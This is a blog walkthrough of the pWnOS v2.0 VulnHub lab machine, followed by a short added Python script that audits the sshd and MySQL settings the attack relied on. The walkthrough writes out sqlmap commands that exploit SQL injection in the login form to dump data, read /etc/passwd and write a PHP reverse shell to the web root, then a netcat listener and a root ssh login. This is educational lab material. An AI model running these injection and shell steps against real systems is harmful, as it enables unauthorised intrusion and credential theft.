pWnOS v2.0: VulnHub Walkthrough


Hello everyone. In this blog post I am going to walk through pWnOS v2.0.

It is a machine which will enhance your penetration testing skills.

You can download the machine from this link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

Let’s Start,

Configure your attacking platform to be within the 10.10.10.0/24 network range

Target IP- 10.10.10.100

Attacker IP- 10.10.10.101

Let’s start with nmap

nmap -A 10.10.10.100

As we have found a web application running on TCP port 80, we can do some further enumeration using a browser:

Next, I ran nikto to look for login pages.

I tried the /includes directory.

On trying the login page, it turned out to be vulnerable to SQL injection, so we could use sqlmap against it.

It is showing logging..

With the help of Burp Suite, we capture all the parameters the form submits and pass them to sqlmap:

sqlmap -u http://10.10.10.100/login.php --data="email=test%40test.hu&pass=test&submit=Login&submitted=TRUE"

It shows that email might be injectable.

So we try to dump the results:

sqlmap -u http://10.10.10.100/login.php --data="email=test%40test.hu&pass=test&submit=Login&submitted=TRUE" --dump

We got the hash but it was of no use

Next I tried the users and passwords:

sqlmap -u http://10.10.10.100/login.php --data="email=test%40test.hu&pass=test&submit=Login&submitted=TRUE" --users --passwords

We got a password, but again it was of no use.

Then I tried to read the passwd file:

sqlmap -u http://10.10.10.100/login.php --data="email=test%40test.hu&pass=test&submit=Login&submitted=TRUE" --file-read /etc/passwd

It shows that the output is in root itself, i.e. /root.

So I tried to get a limited shell using this same path:

sqlmap -u http://10.10.10.100/login.php --data="email=test%40test.hu&pass=test&submit=Login&submitted=TRUE" --file-write /root/php-reverse-shell.php --file-dest /var/www/includes/reverseshell.php

After doing this and starting the listener, I got the limited shell:

nc -nlvp 1234

It shows that we have got user access.

Going into the var directory and then www, we found some files, and the mysqli_connect.php file gave us the passwords.

But none of them worked, so I moved back to var and again checked the mysqli_connect.php file, and bingo, we got the correct password.

Then we use ssh and enter the correct password:

ssh root@10.10.10.100

We got the root access!!
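From the defender's side, the chain above depended on settings that can be audited: sqlmap's file read and write options rely on the database account's global FILE privilege and on an unrestricted secure_file_priv, and the last step needed sshd to accept a root password login. The script below is an added example, not part of the original walkthrough; the config texts, grant lines and account names are constructed, and the sshd defaults are assumed to be those of OpenSSH 7.0 or later.

```python
import re

# Constructed sample inputs, not taken from the target VM.
SSHD_CONFIG = "Port 22\nPermitRootLogin yes\n#PasswordAuthentication no\n"
MY_CNF = "[mysqld]\ndatadir = /var/lib/mysql\nsecure_file_priv = \"\"\n"
GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost'",  # hypothetical accounts
          "GRANT SELECT, INSERT ON `app`.* TO 'report'@'localhost'"]

def sshd_option(text, key, default):
    """sshd keeps the first value it reads for a keyword; keywords are case-insensitive."""
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)
        if len(parts) == 2 and parts[0].lower() == key.lower():
            return parts[1].strip().lower()
    return default

def mysqld_option(text, key):
    """Return the last value of `key` in [mysqld], or None if it is never set."""
    section, value = None, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("["):
            section = line.strip("[]").lower()
        elif section == "mysqld" and "=" in line and line[0] not in "#;":
            k, v = (s.strip() for s in line.split("=", 1))
            if k.replace("-", "_").lower() == key:
                value = v.strip("'\"")
    return value

def audit(sshd_text, my_cnf_text, grants):
    findings = []
    # Assumed defaults: OpenSSH 7.0+ (older releases default PermitRootLogin to yes).
    if (sshd_option(sshd_text, "PermitRootLogin", "prohibit-password") == "yes"
            and sshd_option(sshd_text, "PasswordAuthentication", "yes") == "yes"):
        findings.append("sshd: root may log in with a password")
    sfp = mysqld_option(my_cnf_text, "secure_file_priv")
    if sfp is None:
        findings.append("mysqld: secure_file_priv not set explicitly")
    elif sfp == "":
        findings.append("mysqld: secure_file_priv is empty, file reads/writes unrestricted")
    for g in grants:
        m = re.match(r"GRANT (.+?) ON \*\.\* TO (\S+)", g, re.I)
        if m and re.search(r"\b(ALL PRIVILEGES|FILE)\b", m.group(1), re.I):
            findings.append(f"mysql: {m.group(2)} holds the global FILE privilege")
    return findings

if __name__ == "__main__":
    for finding in audit(SSHD_CONFIG, MY_CNF, GRANTS):
        print(finding)
```

On a real host the grant lines would come from SHOW GRANTS for the web application's database account.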

Writer: Shubhankar is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
